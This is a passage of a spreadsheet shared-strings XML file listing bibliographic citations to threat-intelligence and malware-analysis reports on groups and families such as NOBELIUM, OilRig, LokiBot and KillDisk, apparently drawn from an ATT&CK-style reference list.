  <si>
    <t>Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.</t>
  </si>
  <si>
    <t>Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC245Retrieved March 12, 2021.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.</t>
  </si>
  <si>
    <t>E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.</t>
  </si>
  <si>
    <t>Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.</t>
  </si>
  <si>
    <t>ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.</t>
  </si>
  <si>
    <t>Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.</t>
  </si>
  <si>
    <t>Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.</t>
  </si>
  <si>
    <t>TrueSec. (n.d.). gsecdump v2.0bRetrieved September 29, 2015.</t>
  </si>
  <si>
    <t>DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.</t>
  </si>
  <si>
    <t>Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.</t>
  </si>
  <si>
    <t>Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.</t>
  </si>
  <si>
    <t>Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.</t>
  </si>
  <si>
    <t>Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.</t>
  </si>
  <si>
    <t>FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.</t>
  </si>
  <si>
    <t>Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.</t>
  </si>
  <si>
    <t>Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.</t>
  </si>
  <si>
    <t>Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.</t>
  </si>
  <si>
    <t>McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.</t>
  </si>
  <si>
    <t>A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.</t>
  </si>
  <si>
    <t>Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.</t>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.</t>
  </si>
  <si>
    <t>Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.</t>
  </si>
  <si>
    <t>Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.</t>
  </si>
  <si>
    <t>Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.</t>
  </si>
  <si>
    <t>US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.</t>
  </si>
  <si>
    <t>Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.</t>
  </si>
  <si>
    <t>ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Desai, D.. (2015, August 14). Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.</t>
  </si>
  <si>
    <t>Dan Goodin. (2017, January 23). Virulent Android malware returns, gets &gt;2 million downloads on Google Play. Retrieved January 24, 2017.</t>
  </si>
  <si>
    <t>Petrovsky, O. (2016, August 30). “9002 RAT” -- a second building on the left. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Huss, D. &amp; Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Falcone, R. &amp; Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.</t>
  </si>
  <si>
    <t>Fitzgerald, P. (2010, January 26). How Trojan.Hydraq Stays On Your Computer. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>1Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.</t>
  </si>
  <si>
    <t>Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.</t>
  </si>
  <si>
    <t>Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.</t>
  </si>
  <si>
    <t>Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.</t>
  </si>
  <si>
    <t>Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.</t>
  </si>
  <si>
    <t>Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.</t>
  </si>
  <si>
    <t>Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Wikipedia. (2016, January 26). ifconfig. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Malware of 201Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Unit 4(2019, December 2). Imminent Monitor – a RAT Down Under. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>SecureAuth. (n.d.). Retrieved January 15, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>Core Security. (n.d.). Impacket. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.</t>
  </si>
  <si>
    <t>Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.</t>
  </si>
  <si>
    <t>A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020.</t>
  </si>
  <si>
    <t>I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.</t>
  </si>
  <si>
    <t>Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 201Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.</t>
  </si>
  <si>
    <t>Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.</t>
  </si>
  <si>
    <t>Moran, N., &amp; Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Moran, N., Oppenheim, M., Engle, S., &amp; Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.</t>
  </si>
  <si>
    <t>Brod. (2013, July 15). Signed Mac Malware Using Right-to-Left Override Trick. Retrieved July 17, 2017.</t>
  </si>
  <si>
    <t>Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.</t>
  </si>
  <si>
    <t>Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>ESET Research. (2015, July 10). Sednit APT Group Meets Hacking Team. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kamluk, V. &amp; Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc.. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.</t>
  </si>
  <si>
    <t>Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Manuel, J. and Plantado, R.. (2015, August 9). Win32/Kasidet. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.</t>
  </si>
  <si>
    <t>Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.</t>
  </si>
  <si>
    <t>Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2017, January 1). Mac Malware of 201Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.</t>
  </si>
  <si>
    <t>Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.</t>
  </si>
  <si>
    <t>Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.</t>
  </si>
  <si>
    <t>Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.</t>
  </si>
  <si>
    <t>Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.</t>
  </si>
  <si>
    <t>M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.</t>
  </si>
  <si>
    <t>Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.</t>
  </si>
  <si>
    <t>Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.</t>
  </si>
  <si>
    <t>Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.</t>
  </si>
  <si>
    <t>Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.</t>
  </si>
  <si>
    <t>Mandiant. (2018). Mandiant M-Trends 201Retrieved July 9, 2018.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil &amp; Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>AT&amp;T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>1Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.</t>
  </si>
  <si>
    <t>Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.</t>
  </si>
  <si>
    <t>Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.</t>
  </si>
  <si>
    <t>Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Greenberg, A. (2019, March 25). A Guide to LockerGoga, the Ransomware Crippling Industrial Firms. Retrieved July 17, 2019.</t>
  </si>
  <si>
    <t>ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.</t>
  </si>
  <si>
    <t>Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.</t>
  </si>
  <si>
    <t>Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Dragos. (null). TALONITE. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>Villeneuve, N., Sancho, D. (2011). THE “LURID” DOWNLOADER. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.</t>
  </si>
  <si>
    <t>The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>PETER EWANE. (2017, June 9). MacSpy: OS X RAT as a Service. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.</t>
  </si>
  <si>
    <t>Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.</t>
  </si>
  <si>
    <t>Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.</t>
  </si>
  <si>
    <t>Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 201Retrieved October 4, 2016.</t>
  </si>
  <si>
    <t>Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.</t>
  </si>
  <si>
